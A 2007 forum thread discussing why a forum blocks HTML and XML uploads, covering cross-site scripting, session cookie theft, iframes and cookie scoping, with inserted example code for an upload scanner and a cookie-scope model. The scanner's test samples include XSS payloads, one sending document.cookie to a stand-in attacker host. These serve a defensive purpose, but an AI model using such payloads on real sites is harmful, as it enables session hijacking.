Thread Closed

Can we upload XML?

Jun13-07, 08:28 AM   #1
 
Recognitions: Gold Member

Can we upload XML?


I just went to attach an XML file to a post and found out that neither it nor HTML is allowed. Has anyone asked for this yet? I think it would be nice (obviously).
 
Jun14-07, 08:01 PM   #2
 
Recognitions: Science Advisor
That would be a security hole. If you were able to upload an html/xml page then the uploaded html page, residing on the physicsforums.com server, would have access to site cookies and so might be used for cross-site scripting and stealing of sessions.
 
Jun14-07, 09:43 PM   #3
 
Recognitions: Gold Member
Oh. Hm. Well, attachments have to be approved anyway, so is there an easy way to check such files as part of the approval process?

The problem is that browsers will execute scripts in html and xml files, is that it? Are you just worried about client-side scripting? If that's it, is there another way to include scripts in an html or xml file other than with html's script element?

You'd want to also check any files that get fetched and included. Perhaps there is a safe way to just render the page and complain if it does something bad?

Or can you just store them somewhere special and restrict them that way?

It's not a big deal. I'm just wondering. If I could help at all, I'd be glad to.
 
Jun14-07, 09:52 PM   #4
Evo
 
Mentor
Blog Entries: 4

Can we upload XML?


Quote by honestrosewater:
Oh. Hm. Well, attachments have to be approved anyway, so is there an easy way to check such files as part of the approval process?
When you go to attachments, it lists the approved file types.
 
Jun14-07, 11:28 PM   #5
 
You could always upload the files as .txt files (XML is just text, right?), and have the person/s change the extensions themselves (just go to Notepad and save the file with the desired extension).
 
Jun15-07, 12:01 AM   #6
 
Recognitions: Gold Member, Staff Emeritus
Just post the code and we'll figure out what the file was supposed to be.
 
Jun15-07, 12:03 AM   #7
 
Recognitions: Gold Member
Quote by Evo:
When you go to attachments, it lists the approved file types.
Right, I'm wondering if xml and html can be added to the list.

Quote by mattmns:
You could always upload the files as .txt files (XML is just text right?), and have the person/s change the extensions themselves (just go to notepad and save the file with the desired extension).
Yeah, that's probably what I'll do if this doesn't work.
 
Jun15-07, 12:10 AM   #8
 
Recognitions: Gold Member
Quote by loseyourname:
Just post the code and we'll figure out what the file was supposed to be.
I don't understand. The file is XML. This particular file is just a list, but the list has 330 items, so I didn't want to post it as a regular post. I had compiled the list in XML anyway, so I was just going to attach the file (well, I added some inline CSS to it so it would be prettier too).
 
Jun15-07, 12:21 AM   #9
 
Recognitions: Gold Member, Staff Emeritus
What I meant was that readers could parse the code in their heads and infer what the list would look like. dduardo used to joke about doing that using a plain-text browser that didn't parse any code. I was also, of course, joking. Although it is certainly possible to parse code in one's head, I doubt anyone really wants to.

But, if you want, you can always post the file somewhere else and post a link to it here. Free web space that your ISP gives you is useful for these types of dilemmas. I'm sure you can figure some way to make the list using an approved file type, too.
 
Jun15-07, 02:34 AM   #10
 
Recognitions: Gold Member
Quote by loseyourname:
I was also, of course, joking.
You really should warn people when you're doing that.
 
Jun15-07, 06:29 AM   #11
 
The most obvious solution would be to use an external filehost.
 
Jun15-07, 07:22 AM   #12
 
Recognitions: Gold Member
Right, and that option is also there for the other types of files that PF does allow. Storing it on PF is more convenient. Also, I tried two sites and searched for more, and none of them gave direct links, so you can't just visit the URL and render the file. You have to save it locally (after possibly waiting for a timer and watching ads). Most image-hosting sites don't make you do that.
 
Jun15-07, 07:49 AM   #13
 
Recognitions: Science Advisor
Quote by honestrosewater:
The problem is that browsers will execute scripts in html and xml files, is that it? Are you just worried about client-side scripting? If that's it, is there another way to include scripts in an html or xml file other than with html's script element?
There's the script tag, iframes and framesets, links that start with "javascript:", events such as onload, onmouseover, etc. All of these would need to be parsed out.
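
The list above is what an approval-time check would have to look for. As an added example (not code from the thread or from PhysicsForums), the Node.js script below scans an uploaded HTML or XML file for exactly those vectors: script elements, iframes and framesets, `javascript:` URLs and `on*` event handlers. It also checks for object/embed elements and for a non-CSS `xml-stylesheet` processing instruction (an XSLT sheet a browser would execute), which go beyond -Job-'s list. The sample files are constructed for the example. It is a denylist, so an empty result means only that none of the listed patterns were found, not that the file is safe.

```javascript
// Added example, not from the thread: pre-approval scan of an uploaded HTML/XML
// file for the active-content vectors -Job- lists (script elements, iframes and
// framesets, javascript: URLs, on* handlers) plus object/embed and XSLT PIs.
// Denylist semantics: it reports what it recognises and nothing else.

// Browsers decode numeric character references in attribute values and ignore
// tab/CR/LF inside a URL scheme, so normalise the same way before matching;
// otherwise "j&#97;vascript:" or "java\nscript:" would slip past.
function normalize(markup) {
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');
  return markup
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => cp(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => cp(parseInt(dec, 10)))
    .replace(/[\u0000-\u0008\u000b\u000c\u000e-\u001f]/g, '');
}

// "javascript:" with any mix of tab/CR/LF between the letters.
const JS_SCHEME = 'javascript'.split('').join('[\\t\\n\\r]*') + '[\\t\\n\\r]*:';

const VECTORS = [
  { name: 'script element', re: /<\s*script\b/i },
  { name: 'iframe/frame/frameset element', re: /<\s*(?:iframe|frame|frameset)\b/i },
  { name: 'javascript: URL in an attribute',
    re: new RegExp('(?:href|src|action|formaction|data|xlink:href)\\s*=\\s*["\']?\\s*' + JS_SCHEME, 'i') },
  { name: 'inline event handler (on*=)', re: /[\s"'\/]on[a-z]+\s*=/i },
  { name: 'object/embed element', re: /<\s*(?:object|embed)\b/i },
  // An xml-stylesheet PI that is not plain CSS may point at an XSLT sheet,
  // which browsers run and which can emit script into the result.
  { name: 'non-CSS xml-stylesheet PI', re: /<\?xml-stylesheet\b(?![^?>]*type\s*=\s*["']text\/css["'])/i },
];

// Returns the names of every vector found (empty array when none matched).
function scanMarkup(markup) {
  const doc = normalize(markup);
  return VECTORS.filter((v) => v.re.test(doc)).map((v) => v.name);
}

function approvable(markup) {
  return scanMarkup(markup).length === 0;
}

// Constructed samples: a harmless XML list with inline CSS (the kind of file the
// original poster wanted to attach) and one file per vector.
const BENIGN_XML = `<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/css" href="list.css"?>
<list>
  <item style="color:#333">First entry</item>
  <item style="color:#333">Second entry</item>
</list>`;

const SAMPLES = {
  scriptTag: '<html><body><script>new Image().src="//attacker.example/?c="+document.cookie</script></body></html>',
  entityEncodedHref: '<a href="j&#97;va&#x73;cript:alert(document.cookie)">click</a>',
  splitScheme: '<svg><a xlink:href="java\nscript:alert(1)"><text>x</text></a></svg>',
  eventHandler: '<img src="x" onerror="alert(document.cookie)">',
  framedForum: '<iframe src="/vb/index.php"></iframe>',
  xslt: '<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="sheet.xsl"?><root/>',
};

for (const [label, markup] of Object.entries({ benignList: BENIGN_XML, ...SAMPLES })) {
  const verdict = approvable(markup) ? 'clean' : 'REJECT: ' + scanMarkup(markup).join('; ');
  console.log(label.padEnd(18), verdict);
}
```

Two practical notes: the check runs on the raw bytes the moderator would otherwise have to open in a browser, so it belongs before anyone renders the file; and because it is pattern-based it will also flag harmless text such as a stray `once =` in prose, which is the right failure direction for an approval gate.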
 
Jun15-07, 08:00 AM   #14
 
There are several filehosts that do not require you to watch ads before downloading, such as

http://fileupyours.com/

I've used them for a while without any problems.
 
Jun15-07, 09:55 AM   #15
 
Recognitions: Gold Member
Quote by -Job-:
There's the script tag, iframes and framesets, links that start with "javascript:", events such as onload, onmouseover, etc. All of these would need to be parsed out.
Ah, okay then. Just out of curiosity, is there a way to simply tell a script that the cookies don't exist?

I saw the HttpOnly flag, but FF (for one) won't support it until version 3.

Also, is a cookie's host (the "author" of the cookie or whatever) identified by only the domain name, or does it use the fully-qualified domain name, or does it end up using IP addresses, does it keep track of ports, etc.? I'm mildly confused about how this all works, but is there no way to do it with, say, virtual hosting and subdomains or something? Just store the suspect files in a different document root? I don't care about actually doing it. I'm just wondering if there is a solution.

Thanks for the link, Moridin.
 
Jun15-07, 09:57 AM   #16
 
Recognitions: Gold Member, Science Advisor, Staff Emeritus
I don't understand. If it's just a list, why can't you put it in a text file? What advantage would using XML give you that would justify using it here? I'm not totally sure what one does with XML anyway. As for HTML, it should be pretty obvious that there is just too much someone can do with it that would be malicious to allow that here. You have to remember that for a moderator to decide to approve an attachment, we have to view it first, on our own computers, and we're certainly not going to risk our computers just for some fancy bells and whistles in posts. As it is, I don't even like that zip files are allowed because you just never know what's in one of those until it's unzipped. We toss those around like hot potatoes, seeing who is bravest to download and open to approve the attachment.
 
Jun15-07, 10:44 AM   #17
 
Recognitions: Science Advisor
Quote by honestrosewater:
Ah, okay then. Just out of curiosity, is there a way to simply tell a script that the cookies don't exist?

I saw the HttpOnly flag, but FF (for one) won't support it until version 3.

Also, is a cookie's host (the "author" of the cookie or whatever) identified by only the domain name, or does it use the fully-qualified domain name, or does it end up using IP addresses, does it keep track of ports, etc.? I'm mildly confused about how this all works, but is there no way to do it with, say, virtual hosting and subdomains or something? Just store the suspect files in a different document root? I don't care about actually doing it. I'm just wondering if there is a solution.

Thanks for the link, Moridin.
When you set a cookie, by default the cookie's domain is the domain the script came from, but you can specify a path so that only scripts in that path have access to the cookie. PF's cookie is global to the domain because there are many forum folders that need access to the cookie.

Even if you move PF to /vb, create an upload folder at /upload and set the cookie's path to www.physicsforums.com/vb, the html file in the upload folder, though it doesn't have direct access to the site's cookies, would still be able to access the cookie via an iframe pointing to the main PF page, since it's in the same domain. A page can access and manipulate scripts on a page in one of its iframes as long as both pages are in the same domain, which is the case. Browser security varies of course.
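
To make the two mechanisms in this exchange (post #2's same-origin cookie access and the path-scoping versus iframe argument of post #17) concrete, here is an added example, not code from the thread or from PhysicsForums. It models the two rules separately: the same-origin policy (scheme, host and port must all match before one page can script another, such as a framed forum page) and cookie scope as specified in RFC 6265 (host plus path; port is ignored, scheme matters only through the Secure flag). It also goes one step beyond the thread by showing the subdomain layout honestrosewater asked about, which works only if the session cookie stays host-only. The cookie name, the uploads hostname and the /vb and /upload paths are illustrative assumptions.

```javascript
// Added example, not from the thread: can an uploaded page reach the forum's
// session cookie? Two separate rules decide it:
//   1. Same-origin policy: a page may script another page it frames or opens
//      only if scheme, host AND port all match.
//   2. Cookie scope (RFC 6265): a cookie is sent when the request host
//      domain-matches the cookie's Domain and the path path-matches its Path.
//      Port is ignored; scheme matters only via the Secure attribute.
// Host names, paths and the cookie name below are assumptions for illustration.

function originOf(url) {
  const u = new URL(url);
  const scheme = u.protocol.slice(0, -1);                 // "https:" -> "https"
  const port = u.port || (scheme === 'https' ? '443' : '80');
  return { scheme, host: u.hostname, port };
}

function sameOrigin(urlA, urlB) {
  const a = originOf(urlA);
  const b = originOf(urlB);
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// hostOnly === true models a Set-Cookie with no Domain attribute (the browser
// default): only the exact host that set it gets it back. Domain=physicsforums.com
// would instead hand the cookie to every subdomain, including one used for uploads.
function domainMatches(host, cookie) {
  if (cookie.hostOnly) return host === cookie.domain;
  return host === cookie.domain || host.endsWith('.' + cookie.domain);
}

// RFC 6265 path-match: equal, or the cookie path is a prefix that ends in "/"
// or is followed by "/" in the request path.
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || requestPath[cookiePath.length] === '/';
}

function cookieVisibleTo(cookie, url) {
  const u = new URL(url);
  if (cookie.secure && u.protocol !== 'https:') return false;
  return domainMatches(u.hostname, cookie) && pathMatches(u.pathname, cookie.path);
}

// The uploaded page gets the session either by reading the cookie itself or by
// scripting a framed forum page that can read it (the iframe route in post #17).
function uploadCanReachSession(uploadUrl, appUrl, cookie) {
  const direct = cookieVisibleTo(cookie, uploadUrl);
  const viaFrame = sameOrigin(uploadUrl, appUrl) && cookieVisibleTo(cookie, appUrl);
  return { direct, viaFrame, reachable: direct || viaFrame };
}

const APP_PAGE = 'https://www.physicsforums.com/vb/index.php';
// Tightest scope the /vb layout allows: host-only, Path=/vb, Secure.
const PATH_SCOPED_COOKIE = { name: 'session', domain: 'www.physicsforums.com', path: '/vb', hostOnly: true, secure: true };
// What a Domain=physicsforums.com; Path=/ cookie looks like.
const DOMAIN_WIDE_COOKIE = { name: 'session', domain: 'physicsforums.com', path: '/', hostOnly: false, secure: true };

const SCENARIOS = [
  ['same host, /upload folder, path-scoped cookie', 'https://www.physicsforums.com/upload/file.html', PATH_SCOPED_COOKIE],
  ['same host, different port, domain-wide cookie', 'https://www.physicsforums.com:8443/upload/file.html', DOMAIN_WIDE_COOKIE],
  ['separate upload host, host-only cookie', 'https://uploads.physicsforums.com/file.html', PATH_SCOPED_COOKIE],
  ['separate upload host, domain-wide cookie', 'https://uploads.physicsforums.com/file.html', DOMAIN_WIDE_COOKIE],
];

for (const [label, uploadUrl, cookie] of SCENARIOS) {
  console.log(label.padEnd(48), JSON.stringify(uploadCanReachSession(uploadUrl, APP_PAGE, cookie)));
}
```

The first scenario is -Job-'s point: Path=/vb keeps the cookie away from /upload directly, but the upload shares the origin with /vb, so framing the forum page recovers it. The second shows that a different port blocks scripting but not the cookie itself. The last two show the fix that actually separates things: serve uploads from their own hostname, and keep the session cookie host-only, because a Domain=physicsforums.com cookie follows the user to the upload host.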
 